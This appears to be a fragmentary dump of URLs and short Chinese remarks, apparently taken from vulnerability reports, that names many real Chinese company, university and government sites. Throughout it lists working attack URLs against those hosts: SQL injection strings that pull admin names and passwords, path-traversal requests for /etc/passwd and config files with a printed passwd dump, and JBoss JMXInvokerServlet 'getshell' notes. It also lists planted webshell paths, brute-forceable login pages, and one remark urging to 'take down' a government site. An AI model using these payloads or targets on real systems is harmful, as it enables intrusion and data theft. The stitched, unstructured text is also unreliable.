http://kitas.tongbanjie.com/user/login http://sso.tongbanjie.com/index http://mobile.tcl.com/index.php http://ship.xgimi.com/admin.php?c=login www.baofen.cn)隶属于天弘基金管理有限公司,在2014年6月余额宝上线一周年之际重磅推出,是余额宝用户专属的交流互助平台。 http://www.baofen.cn/wwwroot.tar.gz http://test.gfan.com:8082/struts_spy/example/HelloWorld.action http://test.gfan.com:8082/jmx-console/ http://course.cuc.edu.cn/course/web066/web066/viewPage.php?type=exercise http://course.cuc.edu.cn/course/web066/web066/download.php?filename=Pa-o29rF.DOC http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../../../../../../etc/passwd http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0 http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../download.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../download.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../viewPage.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../include/connDB.php http://youxuan.homeinns.com/Account/login www.lfjcy.gov.cn http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/upload/1404877864.doc http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/downLoad.php http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/index.php http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/connect.php http://www.lfjcy.gov.cn/activity/login.php http://www.zmagri.gov.cn/先拿下这个网站 www.xyagri.gov.cn这个站的权限 http://service5.qcc.qunar.com/cdrOb!list.action http://myvideo.tiandy.com/login.action?language=cn http://en.tiandy.com/Public/kindeditor/php/demo.php http://en.tiandy.com//Public/uploads/file/20150510/20150510004217_60940.html http://foc.donghaiair.cn/GenericQuery/FlightInfoBoardOA.aspx http://foc.donghaiair.cn/download/oracle817/doc/Support/html/cpyr.htm http://foc.donghaiair.cn/download 
http://foc.donghaiair.cn/download/ftp%20%E5%AF%86%E7%A0%81.txt http://www.nandu.com/itag/Login这个接口,是南都网络首页登陆的接口,可以看到登陆的地方没有任何限制 http://www.51bi.com/space/biuser/login.jsp?currentUrl=http%3A%2F%2Fwww.51bi.com%2F登陆的地方没有验证码限制 https://**.**.** http://photo.hsw.cn/work/detail?id=8498 http://220.178.8.155//user/reg_check.php?loginname=11111 http://www.tiamaes.com/case/ddxt/ http://117.158.104.47:8000/right/loginPwd.jsp http://117.158.104.47:8000/gps/loginPwd.jsp http://218.29.211.2:8000/right/loginPwd.jsp http://218.29.211.2:8000/oa/loginPwd.jsp http://218.29.211.2:8000/rlzy/loginPwd.jsp http://221.178.242.61:8000/right/loginPwd.jsp http://221.178.242.61:8000/oa/loginPwd.jsp http://221.178.242.61:8000/money/loginPwd.jsp http://218.27.133.147:8000/gps/loginPwd.jsp http://218.27.133.147:8000/right/loginPwd.jsp http://222.179.97.83:8000/right/loginPwd.jsp http://222.179.97.83:8000/gps/loginPwd.jsp http://*/jmx-console http://117.158.104.47:8000/jmx-console http://218.29.211.2:8000/jmx-console http://221.178.242.61:8000/jmx-console http://218.27.133.147:8000/jmx-console http://222.179.97.83:8000/jmx-console http://tdoao123.xicp.net:6680/login.html inurl:house/hs_open.asp?id= www.tzjiahao.cn http://www.smfdcw.com/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://www.wlfdcw.com/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://www.jsfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://qtfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://yhfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager inurl:house/showhouse.asp?HID= 
http://www.wlfdcw.com/house/showhouse.asp?HID=345%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12,13,14,pwd,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%20from%20manager http://www.smfdcw.com/house/showhouse.asp?HID=403 http://www.zjfdcw.cn/house/showhouse.asp?HID=10 http://www.jsfdcw.cn/house/showhouse.asp?HID=1 http://yhfdcw.cn//house/showhouse.asp?HID=10 http://qtfdcw.cn/house/showhouse.asp?HID=10 http://**.**.**/ http://**.**.** http://user.u17.com/user/ajax.php?mod=title&act=title_vip&title_id=1&_=1431245513778 http://office.feng.com:8099/ http://113.108.53.7:8099/system/systemLogonAction.do http://jgzy.shzj.gov.cn:9088/Lzfxfk/expertBaseRegister.action http://jgzy.shzj.gov.cn:9088/invoker/JMXInvokerServlet部署war进行getshell https://116.228.218.6/AuditSec/view http://refer.medlive.cn/ http://gd.189.cn/goods/html/kdts/main/operIndex.html?orderIndex http://map.iyiyun.com/Admin/login/login www.sdydf.gov.cn http://www.sdyl.gov.cn/login.aspx http://202.109.191.168:8020/Login.aspx http://erp.huipin.com.cn/index.php/Public/login/ http://www.etuan.com/ www.etuan.com https://github.com/8agoXu/myemail/blob/679db277a3b89f66f7fb4a2c97e4789818e6d363/src/test/java/com/util/mail/MailTest.java http://files.nbl-grp.com:800/login.html http://tdoao123.xicp.net:6680/login.html http://file.myfund.com/login.html http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://61.145.231.102/zhuh_2005/index/index_mz.aspx http://oa.xinhuamed.com.cn/DSOA_TY/index/index.aspx http://shkeylab-ceh.xinhuamed.com.cn/dsoa_xhwj/index/index.aspx http://family.xiangyahui.com/?xflag=4 http://**.**.**/FrameSet/Login.aspx http://www.weloan.com/supervisor http://220.163.113.43/dxyqsyspt/DeviceDetail.aspx?yqbh=2014022200 http://220.163.113.43/dxyqsyspt/AfficheDetail.aspx?id=1 http://220.163.113.43/dxyqsyspt/DevicePairList.aspx?flh=03 http://220.163.113.43/dxyqsyspt/BBShuitie.aspx?id=2 
http://220.163.113.43/dxyqsyspt/DeviceDetail.aspx?yqbh=2014022200 http://211.67.63.14/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://210.31.141.73/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://211.69.16.30/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://211.64.120.53/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://220.163.113.43/dxyqsyspt/AfficheDetail.aspx?id=1 http://211.67.63.14/dxyq/AfficheDetail.aspx?id=1 http://210.31.141.73/dxyq/AfficheDetail.aspx?id=1 http://211.69.16.30/dxyq/AfficheDetail.aspx?id=1 http://211.64.120.53/dxyq/AfficheDetail.aspx?id=1 http://220.163.113.43/dxyqsyspt/DevicePairList.aspx?flh=03 http://211.67.63.14/dxyq/DevicePairList.aspx?flh=03 http://210.31.141.73/dxyq/DevicePairList.aspx?flh=03 http://211.69.16.30/dxyq/DevicePairList.aspx?flh=03 http://211.64.120.53/dxyq/DevicePairList.aspx?flh=03 http://220.163.113.43/dxyqsyspt/BBShuitie.aspx?id=2 http://211.67.63.14/dxyq/BBShuitie.aspx?id=2 http://210.31.141.73/dxyq/BBShuitie.aspx?id=2 http://211.69.16.30/dxyq/BBShuitie.aspx?id=2 http://211.64.120.53/dxyq/BBShuitie.aspx?id=2 http://221.7.12.181:8080/aic/webnz/welcome-web-home!welcome.action shell:http://221.7.12.181:8080/aic/qwe.jsp http://sp.10jqka.com.cn ID:47312 http://visa.ilvxing.com/ucenter/order/cancel/order_id/47313 http://bk.jinhaidai.com/ http://tools.fund.10jqka.com.cn http://download.10jqka.com.cn http://119.147.23.66/ encap:Ethernet addr:10.11.101.12 Bcast:10.11.101.255 Mask:255.255.255.0 fe7c:17ee/64 Scope:Link MTU:1500 packets:3139641 packets:3168161 txqueuelen:1000 https://mail.cpic.com.cn,存在jboss http://www.mafengwo.cn http://www.rtpnr.com www.rtpnr.com http://www.rtpnr.com www.rtpnr.com url:http://210.73.24.2:8080/hola http://dengbao.moe.edu.cn http://117.121.52.116:8081 http://119.233.255.237/xmbtnwx/weixin/accountmanage/account-query.jsp http://119.233.255.237/jbossws13/index.jsp http://ybfk.jxagri.gov.cn:8080/login.aspx http://www.caizhimofang.com/answer/answer/id/20注入点.html www.caizhimofang.com http://www.caizhimofang.com 
http://www.gold678.com/chart/WH.aspx?code= http://124.251.11.38:8000/ http://124.251.11.38:7789/ http://demo.gukun.com/admin_/fileupdate.aspx?action=update&name=error.html http://demo.gukun.com/error.html http://www.myzhongjin.com http://cm.justwin.cn/ http://www.xcrzkj.com/ http://www.bbczcvnt.com/ http://www.bociamc.com.cn/ http://www.dmjtzs.com/ http://114.242.206.5/ http://113.31.17.184/ https://family.sohu-inc.com)和搜狐办公流程系统(http://oa.sohu-inc.com/) http://12345.sanya.gov.cn/ http://**.**.**/spaportal3/jsp/portal/index.jsp http://jgxy.nbu.edu.cn/UploadFiles/200691811326612.xls http://jgxy.nbu.edu.cn/UploadFiles/200691811326612.xls http://www.cj.zstu.edu.cn/cjy/index.php?r=post/down&url=protected/config/main.php&name=main.php http://www.cj.zstu.edu.cn/cjy/index.php?r=admin http://jwc.cueb.edu.cn/UploadFile/2007-10/8/2007108134517805.xls http://jwc.cueb.edu.cn/UploadFile/2007-10/8/2007108134517805.xls http://shengji.gome.com.cn/ com:80可以被xxx.com:888等不同端口读取 http://www.10jqka.com.cn http://121.15.254.7/loginaction.shtml http://121.15.254.7:8080/ http://121.15.254.7:8080/invoker/JMXInvokerServlet http://218.60.146.37/individualSetAction!list.action http://**.**.**/social/ http://27.17.37.98:8080/social/page/jsp/index/login.action http://27.17.37.98:8080/social/page/jsp/index/login.action http://219.140.189.4:18081/upcert3/selfService/selfService_index.action http://219.140.189.4:18081/upcert3/selfService/selfService_index.action http://219.140.189.4:18081/upcert3/qwe.jsp http://www.zjggjj.gov.cn http://old.zjggjj.gov.cn http://www.xmzjefj.gov.cn/SuperviseWeb/jsp/articalWeb/indexArticalWebAction.do http://www.xmzjefj.gov.cn/invokering/JMXInvokerServlet部署war拿shell http://fx.mgyun.com/main/admin/login.aspx http://119.167.245.114:8011/showpic.asp?select_id=342 http://ideas.ac.qq.com/blog/wp-login.php http://mall.essence.com.cn/main/index.shtml http://115.231.37.4:8080/core/config/mysqlConfig.php.bak 
https://github.com/wangzhixing/finance_web/blob/9a261b84c73f45794eb13e73a245ad8cdb5815f9/config/smtp.properties#L9 http://222.35.91.201:7001/defaultroot/login.jsp http://pt.tsinghua.edu.cn:8081/index.asp wifi.189.cn/wap/index.jsp无限次申请上网时长卡, http://m.pconline.com.cn/member/login.htm这个接口,是太平洋电脑网一个分站登陆的接口,可以看到登陆的地方没有任何限制 username:admim password:admin*** http://www.djkfdc.com http://223.202.24.28:8081/boss-self-pc/ http://223.202.24.28:8081/showChart.jsp?filename=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X 
Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin wasu:x:500:500:wasu:/home/wasu:/bin/bash pansj:x:501:501::/home/pansj:/bin/bash boss:x:502:502::/home/boss:/bin/bash zabbix:x:503:503::/home/zabbix:/bin/bash zhongbo:x:504:504::/home/zhongbo:/bin/bash http://223.202.24.28:8081/boss-self-pc/images/sony/ http://eschedule.shanghaigm.com/JQ/DunsLogin.jsp http://doenow.shanghaigm.com/omxclient/core/login.jsp http://passport.17173.com/password/forget http://www.18j5gs.com http://pt.tsinghua.edu.cn:8081/seat_view.asp?ServiceId=3&id=216&seledDate=2015-5-11 http://218.201.232.84/ http://mobilems.corp.elong.com/feedback_showfeedback.html# http://mobilems.corp.elong.com/feedback_showfeedback.html http://**.**.** http://fast.ele.me/workflow/search/WFCustomSearchResult.jsp?query=1&moudle=&workflowid=141&pagenum=1&iswaitdo=0&docids=&tablename=formtable_main_124&issimple=true&customid=&searchtype= http://fast.ele.me/wui/main.jsp?templateId=1 http://x.xdf.cn/login.php这个接口,登陆地方没限制 http://www.caizhimofang.com/Home/Answer/answer/id/15 http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*1%3d6%20AND%20789%3d789 http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*2%3d6%20AND%20789%3d789 http://d.pigai.org/ www.rtpnr.com http://www.rtpnr.com http://www.caizhimofang.com/Home/Answer/index?id=4 http://210.51.18.248/index.php http://stat.ruc.edu.cn/plus/flink.php http://wooyun.org/bugs/wooyun-2010-0106217 http://chanye.hbncw.cn/Manage/Login.aspx http://www.shypost.com/demo/ http://www.shypost.com/demo/CompHonorBig.asp?id=44 http://www.jxhbqy.com/CompHonorBig.asp?id=6 http://www.feng-ling.com.cn/CompHonorBig.asp?id=54 http://www.smr.com.cn/CompHonorBig.asp?id=24 http://www.dd-taihua.com/english/CompHonorBig.asp?id=21 http://www.smr.com.cn/CompHonorBig.asp?id=24 http://www.feng-ling.com.cn/CompHonorBig.asp?id=54 http://202.199.224.144/english/CompHonorBig.asp?id=26 
http://www.chinasuming.com/CompHonorBig.asp?id=33 http://www.czssv.com/CompHonorBig.asp?id=35 http://www.cr162.com/CompHonorBig.asp?id=10 http://www.zyjlib.com/CompHonorBig.asp?id=35 http://www.jxhbqy.com/CompHonorBig.asp?id=6 http://www.bowin.net.cn/CompHonorBig.asp?id=33 http://www.czhty.com/CompHonorBig.asp?id=40 http://218.5.241.11:8041/CompHonorBig.asp?id=18 http://shtgs.net/CompHonorBig.asp?id=35 http://www.aflft.com/CompHonorBig.asp?id=8 http://www.jlthj.com/CompHonorBig.asp?id=32 http://www.junyangchina.com/CompHonorBig.asp?id=32 http://www.aucma56.com/CompHonorBig.asp?id=54 http://www.composite.com.cn/CompHonorBig.asp?id=33 http://www.china-djh.com/Ch/CompHonorBig.asp?id=6 http://www.jrbaoya.com/CompHonorBig.asp?id=18 http://www.talent-sh.com/CompHonorBig.asp?id=17 http://www.shibm.com.cn/CompHonorBig.asp?id=31 http://www.bowenschool.cn/huashan/CompHonorBig.asp?id=4 http://www.bzinfo.ac.cn:803/lm/CompHonorBig.asp?id=10 http://www.chinalanhui.com/CompHonorBig.asp?id=50 http://www.xgxlrmy.com/CompHonorBig.asp?id=10 http://admin.10655792.cn/jsp/j_signon_check http://**.**.**/Login.aspx http://bec.pigai.org/?content-app-getschool http://bec.pigai.org:80/ http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5350 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5349 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5348 http://wooyun.org/bugs/wooyun-2015-096948 http://anbn.spacechina.com/admin/ alt.spacechina.com/guoji/856/185/066/ calt.spacechina.com/news/774/index.html calt.spacechina.com/news/list_13.html http://anbn.spacechina.com/include/uploadAttr.jsp?file_type=1&root_id=3s6260274wkC717 http://scaat.spacechina.com/picnew.asp?id=719 http://110.90.11.69/ http://110.90.11.69/invoker/JMXInvokerServlet,getshell http://cms.17k.com/ihonker.txt http://www.longliqicn.cn/login.html http://220.178.82.246/ http://220.178.82.246/invoker/JMXInvokerServlet,进行getshell 
http://tp.e-land.gov.tw/YilanTraffic/download.jsp?FileName=hosts&FilePath=C:\Windows\System32\drivers\etc\hosts http://www.wooyun.org/bugs/wooyun-2015-0112697/trace/fbb6b8d40ec0866b20926e12d46d550f http://db.duowan.com/dnf/equips.php?filter=q=2 http://diary.jiayuan.com/famousblog/xuxiaoping/33637.html http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=47 http://co-diovan.medlive.cn:80/?m=case&c=option&type=2&keyword=111 http://61.189.240.158:8080/login.aspx http://**.**.**/audit/pages/checkXinnetLogin.action http://user.meitun.com site:meitun.com http://payment.meitun.com/pay/toPay.htm?pid=1234 http://218.89.188.15:88/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3 http://218.89.188.15:88/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=249 http://app.zhcw.com/wwwroot/zhcw/jsp/do3dsjhdc.jsp?method=submit&issueNo= http://app.zhcw.com/wwwroot/zhcw/jsp/ltshmtp.jsp?method=query&ISSUE_NO= id:111355重复 http://vacations.ctrip.com/insurance/order/detailreadonly/1168772259 http://vacations.ctrip.com/insurance/order/detailreadonly/1279919667 http://apping.admin5.com/?app=member&controller=index&action=login这个接口,是A5网一个分站登陆的接口,一开始登陆的地方是没有任何登陆限制的,但是输入错误几次用户名之后就跳出来验证码了 inurl:http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode= http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode=W201503140167732 http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode=W201504120172544 http://www.meitun.com/opinion http://jzcg.faw.com.cn/ http://jzcg.faw.com.cn/register/enter_company.jsp http://218.28.234.171/ http://218.28.234.171/jmx-console http://218.28.234.171/jmx-console部署war进行getshell http://expert.ccidnet.com/中出现平行越权,可以查看其他用户信息和更改密码,而且还有存储型XSS漏洞,两者结合可以使整个网站弹弹弹。。。 http://expert.ccidnet.com/expert/expert_edit.php?eid=9146,可以通过修改eid参数遍历所有专家资料。 http://user.meitun.com/user/mail/bind http://zf.gzcg.gov.cn:8090/auth/login.action http://www.regenttaipei.com/galleria_e/bday.php?gid=6 http://jyz.homelink.com.cn/mypower/downloadUrl.php http://www.ilas.com.cn/ 
Exception:ORA-01756 http://tsg.sz1z.net.cn/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://61.136.150.169/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://ilaslib.zcu.edu.cn/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://211.64.123.7/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://www.sjy-art.org:8081/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 Exception:ORA-01756 http://61.136.150.169/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://www.sjy-art.org:8081/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://211.64.123.7/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://219.134.129.51/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://tsg.sz1z.net.cn/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://kf.web.playcrab.com/question/index?fid=4&sid=10 http://kf.web.playcrab.com/question/detail?code=R7uMf3QC5E2c2pQdTe http://www.whgh.org http://www.kangq.com http://loupan.ythouse.com/main/map_baidu.php?sid=487 http://218.22.20.206/defaultroot/login.jsp http://218.22.20.206/invoker/JMXInvokerServlet,部署war进行getshell http://www.samsoncn.com/ http://passport.mplife.com/login.aspx这个接口,登陆的地方有验证码 http://zjkygl.aqsiq.gov.cn/system/user_updateEmail.action http://zjkygl.aqsiq.gov.cn/system/user_findUser.action 
http://member.9978.cn/login这个接口,也就是9978网主站登陆的接口,可以看到登陆的地方没有任何限制 http://adsmart.dangdang.com http://report.dangdang.com/ http://blog.dangdang.com/ http://report.dangdang.com/s-login http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../ http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/OA Email:rong.hu@bawang.com.cn http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui http://www.bawang.com.cn/wap/nianhui/admins/login.php http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upfiles/up http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upload/ http://www.bawang.com.cn/wap/nianhui/admins/upload/upFiles.php http://www.bawang.com.cn/wap/nianhui/admins/upload/index.php font-family:tahoma,verdana,arial;font-size:12px;line-height:20px;color:#333333;margin-left:0px padding:3px font-size:12px http://duoyunlai.baoogu.com:80/ http://61.178.82.54:9090/zjgl/publicQueryCard.action http://61.178.82.54:8090/exam/login.action http://61.178.82.54:9090/zjgl//qwe.jsp http://www.dcnetworks.com.cn/ http://baby.haier.com/ http://baby.haier.com/Diet/detail/rid/81839 http://mantis.cvte.cn/.svn/entries http://vote.cvte.cn/.svn/entries http://i.cvte.cn/.svn/entries http://a3.cvte.cn/.svn/entries http://s.cvte.cn/.svn/entries http://doc.cvte.cn/.svn/entries http://customer.cvte.cn/.svn/entries http://fs.cvte.cn/.svn/entries http://cps.cvte.cn/.svn/entries http://3g.club.xywy.com/ http://bbr.cashq.ac.cn:8080/ http://bbr.cashq.ac.cn:8080/general/vmeet/wbUpload.php?fileName=1.php+ http://bbr.cashq.ac.cn:8080/general/vmeet/wbUpload/1.php http://xyjg.egs.gov.cn/ECPS_HB/qyxxgsAction_initQyxyxxMain.action?nbxh=MjQyNTAwMDAwMTI5Mzc3Nzk= 
http://gsxt.ngsh.gov.cn/ECPS/enterpriseAbnAction_enterpriseList.action?curr_Page=1 http://xygs.gsaic.gov.cn/gsxygs/pub!getCommon.do?parm=excplist http://love.17173.com/ajax/getajaxinfo.php?url=http://10.59.96.41/&Work=getnewsinfo http://www.yiban.cn http://www.91160.com/forum/detail/id-145.html回复都可xss www.yiban.cn http://link.baidu.com/myrouter/wifiLogin?target=self&getNasBduss=1&toUrl=http://192.168.99.1/cgi-bin/luci/unauth/verify?bdact=login&device_id=null http://192.168.99.1/cgi-bin/luci/;stok=15ee99093643c56457993fdd8dae9773/admin/wifi_n_setting http://xxx.com/admin/fckeditor/editor/dialog/fck_about.html来查看编辑器版本 http://113.31.81.83/ http://113.31.81.83/invoker/JMXInvokerServlet虽然有认证,但是弱口令 http://cloud.efly.cc/index.php/Index/tubeBureau?t=1 http://www.china119.org.cn/admin http://changs.ccgp-hunan.gov.cn:9002/wpwebsys_cs/sys/login!index.action http://gsxt.bjaic.gov.cn/login/newsDetailBj.action http://www.tjqx.gov.cn:81/login.action http://m.apk8.com/info/theme.php?id=2279 http://**.**.** http://hd.1905.com/index.php/Content/detail?id=9 http://119.90.36.104/index.action http://125.62.14.70/ http://125.62.14.70/jmx-consoleing Communicate.asmx/TransformData Communicate.asmx/TransformData http://futures.shihua.com.cn/ http://113.31.81.82/login.jsp http://futures.shihua.com.cn/ http://futures.shihua.com.cn/invoker/JMXInvokerServlet进行getshell http://futures.shihua.com.cn/chopper/chopper.jsp http://www.xunzai.com/company/?id=1 inurl:xunzai.com intitle:admin出后台 http://121.41.102.183:88/res/upload/head/passenger/20150512122136387.asp http://tscp.tempus.cn/supplier/register.do http://tscp.tempus.cn/updownFiles/agent/20150512125902.jsp https://i.gw.com.cn https://i.gw.com.cn javascript://伪协议来定义主页神马的,但是这些都不是本文的重点。重点是一个比较严重的设计缺陷导致命令执行。 Javascript://协议的关系,导致直接调用2345://协议,即本地域,去执行代码,这样一来,危害就很大了。 http://mail.sihc.com.cn/ http://mail.xxx.com.cn/src/ajaxserver.php?exec=recall http://yt.linekong.com/image.php?image_id=15500 http://admin.tsz.gfan.com 
http://admin.tsz.gfan.com/index.php?mod=index&act=Showlist&serverid=1023 http://admin.tsz.gfan.com/index.php?mod=gamedata&act=downregrole&uid=&serverid=1093&starttime=&endtime= http://passport.yesky.com/jsp/newyesky/yeskysys_pass.jsp这个接口,登陆的地方没有任何限制 http://syjx.njxzc.edu.cn/zhanshikebiao.aspx?centid=799&date=2013-12-20&xyid= http://lab.njnu.edu.cn/dkysy/zhanshikebiao.aspx?centid=23&date=2013-12-13&xyid= http://coalab.njupt.edu.cn/nykzsy/zhanshikebiao.aspx?centid=702&date=2015-3-21&xyid= http://sygl.njfu.edu.cn/zhanshikebiao.aspx?centid=32&xykcid=71&skjsid=68671&labid=290&xqid=5 http://dxscx.forestpolice.net/zhanshikebiao.aspx?centid=32&date=2015-3-21&xyid= http://www.multigold.com.cn/ http://zqb.creditease.cn http://data.pension.hexun.com/ http://222.66.10.72/kwms/WEB-INF/web.xml http://222.66.10.72/kwms//WEB-INF/applicationContext.xml http://wapi.hexun.com/Api_newsXml.cc?appId=1&pid=1002347218&pc=20&pn=1 http://113.98.241.231:7979/mineinfo http://183.238.123.235:7979/mineinfo http://wechat.zhiwo.com/ http://www.lljtj.com/ http://www.kingyee.com.cn http://www.medlive.cn/ http://www.kingyee.com.cn//WEB-INF/config/applicationContext-common.xml http://www.kingyee.com.cn/WEB-INF/web.xml等,就不一一列出来了。 http://sm.laiyifen.com/.svn/entries http://wx.laiyifen.com/.svn/entries http://mail.laiyifen.com/names.nsf http://mail.laiyifen.com/webadmin.nsf http://bh.szdiyibo.com/index.php?a=newlist&term=3 http://www.szdiyibo.com/admin/ lg.szdiyibo.com/admin/ bh.szdiyibo.com/admin/ http://scm.flnet.com/Fckeditor/)。(注:此服务器可被提权,黑客很可能已经获取system权限并进行内网渗透) http://www.flnet.com/Index.aspx.bak http://image.flnet.com/icons/small/ http://b2b.flnet.com/editor/license.txt www.gdtech.com.cn http://58.59.177.92:7001/jxhd/Login.action http://123.233.251.222/jxhd/Login.action http://112.230.195.19:8888/jxhd/Login.action http://www.wgyzx.com:7001/jxhd/welcome.action http://124.128.82.110//jxhd/Login.action http://222.187.45.125:7001//jxhd/Login.action 
http://www.zhejiang.gov.cn/vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords= http://baoxian.gome.com.cn/car/order/view_pa http://baoxian.gome.com.cn/car/order/view_pa?orderId=1000007704&applyPolicyId=2000007704 http://doc.epa.gov.tw/IFDEWebBBS_EPA/Download.ashx?path=C:\Windows\System32\drivers\etc\&file=hosts http://service.yi-phone.com为例 http://www.91160.com http://113.106.85.45/ http://113.106.85.45/invoker/JMXInvokerServlet,getshell http://**.**.**/netpreasign/_ http://**.**.**/reglogin/login.domethod=toFindPwdPage_ http://**.**.**/reglogin/tel.domethod=getTelCheckCode&telphone=15193938888_ http://user.anjuke.com/my/login?history=aHR0cDovL3VzZXIuYW5qdWtlLmNvbS9tZW1iZXIvbW9kaWZ5L3VzZXJpbmZvLw==主站的登陆接口没有任何登陆限制 http://xyz.51job.com/Internal/Login.aspx http://www.huazhu.com/login.aspx?backURL=http%3a%2f%2fwww.huazhu.com%2fmyht%2findex.aspx就在主站的登陆接口,发现是有验证码限制的,但是这个验证码是可以绕过的 